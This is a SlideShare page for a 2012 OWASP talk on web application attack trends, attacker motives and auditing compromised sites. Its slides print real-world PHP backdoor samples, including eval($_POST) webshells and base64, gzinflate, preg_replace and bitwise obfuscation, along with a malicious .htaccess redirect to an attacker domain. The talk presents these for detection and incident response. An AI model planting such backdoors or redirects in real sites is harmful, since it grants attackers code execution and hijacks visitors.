SlideShare uma empresa Scribd logo
1 de 54
Copyright © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document
under the terms of the OWASP License.
The OWASP Foundation
OWASP
http://www.owasp.org
The state of web application
security
Robert Rowley
DreamHost
Robert.Rowley@DreamHost.com
2012
OWASP
Break Down
Attack Trends
Attacker Motivation
Auditing Backdoors
OWASP
Trend data sets
26 Million records.
Time frame: August 2011 – March 2012
Collected via WAF (mod_security)
OWASP
Attacks!
OWASP
Breaking it down
OWASP
Life-cycle of an exploit
OWASP
Life-cycle of an exploit
OWASP
InfancyInfancy
PubertyPuberty
MaturityMaturity
Life-cycle of an exploit
OWASP
Source of this trend...
Attacks are automated.
Lead time for attack code update.
Successful compromise adds a new node.
This creates an exponential growth.
OWASP
Attack Response
Notify the ISP's abuse desk
90(ish) ISPs notified each day
Most are non-responsive to the report.
OWASP
Attack sources
 Home/Business ISP (20%)
 Hosting/Datacenter (80%)
OWASP
Find an exploit? Do the right thing.
Bounty programs (facebook, google)
Responsible disclosure
OWASP
Attacker Motivation
?
OWASP
Attacker Motivation
$
OWASP
0-day to Pay-day
 Install backdoors
 Sell access to backdoors on the black market
Phishing
Spam
BlackHat SEO
Traffic Theft
Install more backdoors
OWASP
Payday
Phishing
Identity/Password theft
http://site/some_dir/www.bankingsite.com/
OWASP
Payday
Spam
Everyone knows this already
OWASP
Payday
BlackHat SEO
Hidden links injected on site
Redirect visitors
OWASP
Payday
Traffic Theft
Javascript/Iframe/other
Redirect site traffic to malicious pages (malware
installs)
OWASP
Payday
Install Backdoors
Why not?
Backdoor on backdoor action
OWASP
Little more on traffic theft.
Q1 2012 we noticed an influx of these
Actions were taken, data was recorded
OWASP
Example .htaccess infection:
ErrorDocument 404 http://congatarcxisi.ru/
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|...
RewriteRule ^(.*)$ http://congatarcxisi.ru/ [R=301,L]
OWASP
Collection
 Pulled the remote site from any .htaccess
matching the previous example.
 1000 unique domains found
 Compared them against sitecheck.com
OWASP
SiteCheck report
 Safe ( 2%)
 Low Risk (29%)
 Malicious (31%)
 Unknown (38%)
OWASP
TLD
 .ru(64%)
 .com (14%)
 .info ( 8%)
 .in ( 8%)
 .org ( 3%)
 .net ( 2%)
 other ( 1%)
OWASP
Registrars
 Reg.ru (50%)
 Directi (18%)
 Other (18%)
 GoDaddy (13%)
OWASP
IP address
 other (33%)
 208.87.35.103 (22%)
 94.63.149.246 (10%)
 208.73.210.29 ( 9%)
 69.43.161.154 ( 5%)
 221.132.34.163 ( 5%)
 95.211.131.185 ( 4%)
 74.117.116.96 ( 4%)
 94.63.149.247 ( 2%)
 79.137.226.90 ( 2%)
 69.165.98.21 ( 2%)
 194.28.114.102 ( 2%)
OWASP
A little about incident response
OWASP
Auditing
Immediate mitigation
Put out the fire
Review
Long term fixes
Correct business policy
Secure code and/or configurations
Etc...
OWASP
Make your kung fu stronger.
Monitoring
Vulnerability released,
Incident
Assessment,
Incident Response
Evaluation,
Update
OWASP
Make your kung fu stronger.
Monitoring
Vulnerability released,
Incident
Assessment,
Incident Response
Evaluation,
Update
OWASP
Auditing nitty gritty
File monitoring (you did this right?)
Logs (correlate timestamps)
Logs (sort by request!)
No logs? Malware detection by hand
OWASP
FileSystem Monitoring
Part of your backups.
Just use rsync
Inotify (kernel level)
Tripwire (daemon/service)
DIY
OWASP
Digging in with timestamps.
$ ls -la omgfire.com/backdoor.php
-rw-rw-r-- 1 user grp 0 Feb 13 21:52 omgfire.com/backdoor.php
$ grep 21:52: logs/omgfire.com/access.log.2012-02-13
123.125.71.31 - - [13/Feb/2012:21:52:53 -0800]
"POST /wp-content/plugins/hello.php HTTP/1.1" 200 158 "-" "Mozilla"
OWASP
Digging in with HTTP logs
$ awk '{print $7}' access.log | sort | uniq -c | sort -n
OWASP
$ awk '{print $7}' access.log | sort | uniq -c | sort -n
1 /phpMyAdmin-2.2.3/index.php
1 /phpMyAdmin-2.5.5-pl1/index.php
1 /phpMyAdmin-2.5.5/index.php
1 /phpMyAdmin-2.5.6-rc2/index.php
1 /phpMyAdmin/index.php
1 /pma/index.php
1 /web/phpMyAdmin/index.php
1 /websql/index.php
2 /phpmyadmin/index.php
4 /robots.txt
242 /
Digging in with HTTP logs
OWASP
No success?
Lets get into some backdoor auditing
These backdoors were found in the wild
Show you what to look for
Learn more about the attacker's methods
OWASP
Backdoors
Plaintext
Base64 decode
Preg_replace
and beyond!!!
OWASP
Dead Simple
<?php
eval($_POST['payload']);
?>
OWASP
Some Authentication
if(md5($_COOKIE['be80d91eb9db4ffa'])
== "e8fa67e99b7e07e9e699f8c3d1dbb43d" )
{
eval($_POST['payload']);
exit;
}
OWASP
Well Documented
#####cfg#####
# use password true / false #
$create_password = true;
$password = "mugus"; // default password
# UNIX COMMANDS
# description (nst) command
# example: Shutdown (nst) shutdown -h now
######ver####
$ver= "v2.1";
#############
$pass=$_POST['pass'];
if($pass==$password){ ...
OWASP
Base64 decode
eval(base64_decode('JGF1dGhfcGFzcyA9IC...
OWASP
Base64 decode
eval(base64_decode('JGF1dGhfcGFzcyA9IC...
My favorite way to handle them:
sed s/eval/print/g < inputfile > outputfile
print(base64_decode('JGF1dGhfcGFzcyA9IC...
PHP parser outputs:
$auth_pass = "35a93487bc9204c...
OWASP
GZinflate
<?
error_reporting(0);
echo "ok!";
$code = "xZbNYaMwFFP3lfoO7JJHwnXa … “;
@eval(gzinflate(base64_decode($code)));
?>
OWASP
Gold star for trying ...
eval(gzinflate(str_rot13(base64_decode('FJ3FjsNc
ulJfpXT9WB6YVnfdltmJmW ...
OWASP
Regex revenge
preg_replace("/.*/e","x65x76x61x6Cx28x67...
OWASP
Regex revenge
preg_replace("/.*/e","x65x76x61x6Cx28x67...
65 = e
76 = v
61 = a
6C = l
28 = (
OWASP
Variables as functions
$HixNlV='as';$eQovrf='e';$xsEWcg=$HixNlV.'s'.
$eQovrf.'r'.'t';$HtJYXB='b'.$HixNlV.$eQovrf.
(64).'_'.'d'.$eQovrf.'c'.'o'.'d'.$eQovrf;
@$xsEWcg(@$HtJYXB('ZXZhbChnemluZm...
OWASP
Variables as functions
$HixNlV='as';$eQovrf='e';$xsEWcg=$HixNlV.'s'.
$eQovrf.'r'.'t';$HtJYXB='b'.$HixNlV.$eQovrf.
(64).'_'.'d'.$eQovrf.'c'.'o'.'d'.$eQovrf;
@$xsEWcg(@$HtJYXB('ZXZhbChnemluZm...
assert(base64_decode('ZXZhbChnemluZm...
OWASP
Uhm what...
$FR='sFwFLOzO'|~OU;
$cYqFBi=r7bSCQ&'J|Ok@V';
$z3X0fdta1Nz="c>_"&'Q7[';
$kg6i=#qfapJag'.']/=nX/'^'8'.KyK6.'{';
$iZBTF=lsrc.'<'.Smef&srzI.':'.VmqH;
OWASP
Itty Bitty Bitwise Operators
$FR='sFwFLOzO'|~OU;
$cYqFBi=r7bSCQ&'J|Ok@V';
$z3X0fdta1Nz="c>_"&'Q7[';
$kg6i=#qfapJag'.']/=nX/'^'8'.KyK6.'{';
$iZBTF=lsrc.'<'.Smef&srzI.':'.VmqH;
OWASP
Backdoor Conclusions
They are evolving
Fingerprinting can be untrustworthy
You should monitor your filesystem
OWASP
Thank you
DreamHost & DreamHost customers
Trustwave (mod_security)
OWASP
Further Reading
Mikko Hypponen (TED talks)
http://blog.spiderlabs.com
http://blog.dreamhost.com/category/security
Want to follow up?
Email: robert.rowley@dreamhost.com

Mais conteúdo relacionado

Mais procurados

Owasp top 10-2017
Owasp top 10-2017Owasp top 10-2017
Owasp top 10-2017malvvv
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
[OWASP-Bulgaria] G. Geshev - Chapter Introductory Lecture
[OWASP-Bulgaria] G. Geshev - Chapter Introductory Lecture[OWASP-Bulgaria] G. Geshev - Chapter Introductory Lecture
[OWASP-Bulgaria] G. Geshev - Chapter Introductory LectureG. Geshev
 
Azure Firewall (Meetup Société Générale - dec 2018)
Azure Firewall (Meetup Société Générale - dec 2018)Azure Firewall (Meetup Société Générale - dec 2018)
Azure Firewall (Meetup Société Générale - dec 2018)Marius Zaharia
 
Presentación - Cisco ASA with FirePOWER Services
Presentación -  Cisco ASA with FirePOWER ServicesPresentación -  Cisco ASA with FirePOWER Services
Presentación - Cisco ASA with FirePOWER ServicesOscar Romano
 
Kaspersky antivirus serial
Kaspersky antivirus serialKaspersky antivirus serial
Kaspersky antivirus serialpersonal
 
IE Exploit Protection
IE Exploit ProtectionIE Exploit Protection
IE Exploit ProtectionKim Jensen
 
[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detailOWASP
 
Preventing Known and Unknown Threats
Preventing Known and Unknown ThreatsPreventing Known and Unknown Threats
Preventing Known and Unknown ThreatsOPSWAT
 
RSA USA 2015 - Getting a Jump on Hackers
RSA USA 2015 - Getting a Jump on HackersRSA USA 2015 - Getting a Jump on Hackers
RSA USA 2015 - Getting a Jump on HackersWolfgang Kandek
 
OWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareOWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareAditya K Sood
 

Mais procurados (15)

Owasp top 10-2017
Owasp top 10-2017Owasp top 10-2017
Owasp top 10-2017
 
Owasp and friends
Owasp and friendsOwasp and friends
Owasp and friends
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
OWASP Bulgaria
OWASP BulgariaOWASP Bulgaria
OWASP Bulgaria
 
[OWASP-Bulgaria] G. Geshev - Chapter Introductory Lecture
[OWASP-Bulgaria] G. Geshev - Chapter Introductory Lecture[OWASP-Bulgaria] G. Geshev - Chapter Introductory Lecture
[OWASP-Bulgaria] G. Geshev - Chapter Introductory Lecture
 
(Un)safe Python
(Un)safe Python(Un)safe Python
(Un)safe Python
 
Azure Firewall (Meetup Société Générale - dec 2018)
Azure Firewall (Meetup Société Générale - dec 2018)Azure Firewall (Meetup Société Générale - dec 2018)
Azure Firewall (Meetup Société Générale - dec 2018)
 
Presentación - Cisco ASA with FirePOWER Services
Presentación -  Cisco ASA with FirePOWER ServicesPresentación -  Cisco ASA with FirePOWER Services
Presentación - Cisco ASA with FirePOWER Services
 
Kaspersky antivirus serial
Kaspersky antivirus serialKaspersky antivirus serial
Kaspersky antivirus serial
 
IE Exploit Protection
IE Exploit ProtectionIE Exploit Protection
IE Exploit Protection
 
[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail
 
Preventing Known and Unknown Threats
Preventing Known and Unknown ThreatsPreventing Known and Unknown Threats
Preventing Known and Unknown Threats
 
ZEBRA Environmental DPT Rigs
ZEBRA Environmental DPT RigsZEBRA Environmental DPT Rigs
ZEBRA Environmental DPT Rigs
 
RSA USA 2015 - Getting a Jump on Hackers
RSA USA 2015 - Getting a Jump on HackersRSA USA 2015 - Getting a Jump on Hackers
RSA USA 2015 - Getting a Jump on Hackers
 
OWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareOWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web Malware
 

Semelhante a State of Web App Security 2012

RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingJim Manico
 
Wasc Honeypot Update App Sec2007
Wasc Honeypot Update App Sec2007Wasc Honeypot Update App Sec2007
Wasc Honeypot Update App Sec2007rcbarnett
 
Vulnerability Management In An Application Security World: AppSecDC
Vulnerability Management In An Application Security World: AppSecDCVulnerability Management In An Application Security World: AppSecDC
Vulnerability Management In An Application Security World: AppSecDCDenim Group
 
2009: Securing Applications With Web Application Firewalls and Vulnerability ...
2009: Securing Applications With Web Application Firewalls and Vulnerability ...2009: Securing Applications With Web Application Firewalls and Vulnerability ...
2009: Securing Applications With Web Application Firewalls and Vulnerability ...Neil Matatall
 
Security Code Review for .NET - Sherif Koussa (OWASP Ottawa)
Security Code Review for .NET - Sherif Koussa (OWASP Ottawa)Security Code Review for .NET - Sherif Koussa (OWASP Ottawa)
Security Code Review for .NET - Sherif Koussa (OWASP Ottawa)OWASP Ottawa
 
Csrf protector
Csrf protectorCsrf protector
Csrf protectorMinhaz A V
 
Open Source Security – A vendor's perspective
Open Source Security – A vendor's perspectiveOpen Source Security – A vendor's perspective
Open Source Security – A vendor's perspectiveMatthew Wilkes
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010Aditya K Sood
 
Sophos Day Belgium - This is Next-Gen IT Security (Sophos Intercept X)
Sophos Day Belgium - This is Next-Gen IT Security (Sophos Intercept X)Sophos Day Belgium - This is Next-Gen IT Security (Sophos Intercept X)
Sophos Day Belgium - This is Next-Gen IT Security (Sophos Intercept X)Sophos Benelux
 
This is Next-Gen IT Security - Introducing Intercept X
This is Next-Gen IT Security - Introducing Intercept XThis is Next-Gen IT Security - Introducing Intercept X
This is Next-Gen IT Security - Introducing Intercept XSophos Benelux
 
OSB120 Beat Ransomware
OSB120 Beat RansomwareOSB120 Beat Ransomware
OSB120 Beat RansomwareIvanti
 
OWASP Serbia - A6 security misconfiguration
OWASP Serbia - A6 security misconfigurationOWASP Serbia - A6 security misconfiguration
OWASP Serbia - A6 security misconfigurationNikola Milosevic
 
Continuous Application Security at Scale with IAST and RASP -- Transforming D...
Continuous Application Security at Scale with IAST and RASP -- Transforming D...Continuous Application Security at Scale with IAST and RASP -- Transforming D...
Continuous Application Security at Scale with IAST and RASP -- Transforming D...Jeff Williams
 
Looking Forward… and Beyond - Distinctiveness Through Security Excellence
Looking Forward… and Beyond - Distinctiveness Through Security ExcellenceLooking Forward… and Beyond - Distinctiveness Through Security Excellence
Looking Forward… and Beyond - Distinctiveness Through Security ExcellenceLudovic Petit
 
OWASP_Top_10_Introduction_and_Remedies_2017.ppt
OWASP_Top_10_Introduction_and_Remedies_2017.pptOWASP_Top_10_Introduction_and_Remedies_2017.ppt
OWASP_Top_10_Introduction_and_Remedies_2017.pptjangomanso
 
Software Security Initiative And Capability Maturity Models
Software Security Initiative And Capability Maturity ModelsSoftware Security Initiative And Capability Maturity Models
Software Security Initiative And Capability Maturity ModelsMarco Morana
 
OWASP - Building Secure Web Applications
OWASP - Building Secure Web ApplicationsOWASP - Building Secure Web Applications
OWASP - Building Secure Web Applicationsalexbe
 
Introduction To OWASP
Introduction To OWASPIntroduction To OWASP
Introduction To OWASPMarco Morana
 

Semelhante a State of Web App Security 2012 (20)

RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP Training
 
Wasc Honeypot Update App Sec2007
Wasc Honeypot Update App Sec2007Wasc Honeypot Update App Sec2007
Wasc Honeypot Update App Sec2007
 
Vulnerability Management In An Application Security World: AppSecDC
Vulnerability Management In An Application Security World: AppSecDCVulnerability Management In An Application Security World: AppSecDC
Vulnerability Management In An Application Security World: AppSecDC
 
2009: Securing Applications With Web Application Firewalls and Vulnerability ...
2009: Securing Applications With Web Application Firewalls and Vulnerability ...2009: Securing Applications With Web Application Firewalls and Vulnerability ...
2009: Securing Applications With Web Application Firewalls and Vulnerability ...
 
Security Code Review for .NET - Sherif Koussa (OWASP Ottawa)
Security Code Review for .NET - Sherif Koussa (OWASP Ottawa)Security Code Review for .NET - Sherif Koussa (OWASP Ottawa)
Security Code Review for .NET - Sherif Koussa (OWASP Ottawa)
 
Dependency check
Dependency checkDependency check
Dependency check
 
Csrf protector
Csrf protectorCsrf protector
Csrf protector
 
Open Source Security – A vendor's perspective
Open Source Security – A vendor's perspectiveOpen Source Security – A vendor's perspective
Open Source Security – A vendor's perspective
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010
 
Sophos Day Belgium - This is Next-Gen IT Security (Sophos Intercept X)
Sophos Day Belgium - This is Next-Gen IT Security (Sophos Intercept X)Sophos Day Belgium - This is Next-Gen IT Security (Sophos Intercept X)
Sophos Day Belgium - This is Next-Gen IT Security (Sophos Intercept X)
 
This is Next-Gen IT Security - Introducing Intercept X
This is Next-Gen IT Security - Introducing Intercept XThis is Next-Gen IT Security - Introducing Intercept X
This is Next-Gen IT Security - Introducing Intercept X
 
OSB120 Beat Ransomware
OSB120 Beat RansomwareOSB120 Beat Ransomware
OSB120 Beat Ransomware
 
OWASP Serbia - A6 security misconfiguration
OWASP Serbia - A6 security misconfigurationOWASP Serbia - A6 security misconfiguration
OWASP Serbia - A6 security misconfiguration
 
Continuous Application Security at Scale with IAST and RASP -- Transforming D...
Continuous Application Security at Scale with IAST and RASP -- Transforming D...Continuous Application Security at Scale with IAST and RASP -- Transforming D...
Continuous Application Security at Scale with IAST and RASP -- Transforming D...
 
Looking Forward… and Beyond - Distinctiveness Through Security Excellence
Looking Forward… and Beyond - Distinctiveness Through Security ExcellenceLooking Forward… and Beyond - Distinctiveness Through Security Excellence
Looking Forward… and Beyond - Distinctiveness Through Security Excellence
 
Bug Bounty for - Beginners
Bug Bounty for - BeginnersBug Bounty for - Beginners
Bug Bounty for - Beginners
 
OWASP_Top_10_Introduction_and_Remedies_2017.ppt
OWASP_Top_10_Introduction_and_Remedies_2017.pptOWASP_Top_10_Introduction_and_Remedies_2017.ppt
OWASP_Top_10_Introduction_and_Remedies_2017.ppt
 
Software Security Initiative And Capability Maturity Models
Software Security Initiative And Capability Maturity ModelsSoftware Security Initiative And Capability Maturity Models
Software Security Initiative And Capability Maturity Models
 
OWASP - Building Secure Web Applications
OWASP - Building Secure Web ApplicationsOWASP - Building Secure Web Applications
OWASP - Building Secure Web Applications
 
Introduction To OWASP
Introduction To OWASPIntroduction To OWASP
Introduction To OWASP
 

Mais de Robert Rowley

WordPress Security (know your enemy WordCamp Kyoto)
WordPress Security (know your enemy WordCamp Kyoto)WordPress Security (know your enemy WordCamp Kyoto)
WordPress Security (know your enemy WordCamp Kyoto)Robert Rowley
 
Detecting and Defending Your Privacy Against State-Actor Surveillance
Detecting and Defending Your Privacy Against State-Actor SurveillanceDetecting and Defending Your Privacy Against State-Actor Surveillance
Detecting and Defending Your Privacy Against State-Actor SurveillanceRobert Rowley
 
Privacy; Past, Present and Future
Privacy; Past, Present and FuturePrivacy; Past, Present and Future
Privacy; Past, Present and FutureRobert Rowley
 
Wordpress Security 101
Wordpress Security 101Wordpress Security 101
Wordpress Security 101Robert Rowley
 
Nmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumerationNmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumerationRobert Rowley
 
Teaching Your WAF New Tricks
Teaching Your WAF New TricksTeaching Your WAF New Tricks
Teaching Your WAF New TricksRobert Rowley
 

Mais de Robert Rowley (7)

WordPress Security (know your enemy WordCamp Kyoto)
WordPress Security (know your enemy WordCamp Kyoto)WordPress Security (know your enemy WordCamp Kyoto)
WordPress Security (know your enemy WordCamp Kyoto)
 
Detecting and Defending Your Privacy Against State-Actor Surveillance
Detecting and Defending Your Privacy Against State-Actor SurveillanceDetecting and Defending Your Privacy Against State-Actor Surveillance
Detecting and Defending Your Privacy Against State-Actor Surveillance
 
Privacy; Past, Present and Future
Privacy; Past, Present and FuturePrivacy; Past, Present and Future
Privacy; Past, Present and Future
 
Wordpress Security 101
Wordpress Security 101Wordpress Security 101
Wordpress Security 101
 
Juice Jacking 101
Juice Jacking 101Juice Jacking 101
Juice Jacking 101
 
Nmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumerationNmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumeration
 
Teaching Your WAF New Tricks
Teaching Your WAF New TricksTeaching Your WAF New Tricks
Teaching Your WAF New Tricks
 

Último

Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DaySri Ambati
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 

Último (20)

Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 

State of Web App Security 2012

Notas do Editor

  1. Collected using mod_security across out entire network Let&apos;s jump right in!
  2. Nice average Trending down?
  3. Broken down between SQLI, file upload, File inclusion, and arbitrary code execution attacks
  4. Showing an example of “background noise” These attacks have been aroudn 1+ year
  5. A wild zeroday appears Released beginning of august
  6. Exponential growth until they&apos;re caught/cleaned up.
  7. Many just forward the complaint to their customer (whomever owns the server assigned the IP address) An unsettling few are unable to address this and request help with it (to which we oblige the best we can) These responses let us know who the attackers are, and it&apos;s no surprise!
  8. It should be no surprise that compromised sites are the leading attack source. Compromised sites are used to attack other sites.
  9. Be ethical
  10. I pretty much exclusively see money as the motivating factor. There are exceptions though, quoting Mikko Hypponen, the top three are money, ideology, and espionage So, how do they get money from compromising sites?
  11. The people taking the first step may not be the same who take the final step.
  12. Two examples how this was done via .htaccess
  13. SiteCheck.com&apos;s report on the domain being redirected to.
  14. Breakdown of the TLD used for the domreg.
  15. Domain name registrar breakdown
  16. IP addrss the domains resolved to.
  17. Do not confuse the two, thinking about long term fixes when your site is down is wasting precious time. Thinking that you fixed that “one” hole is good enough is not really a good long term fix.
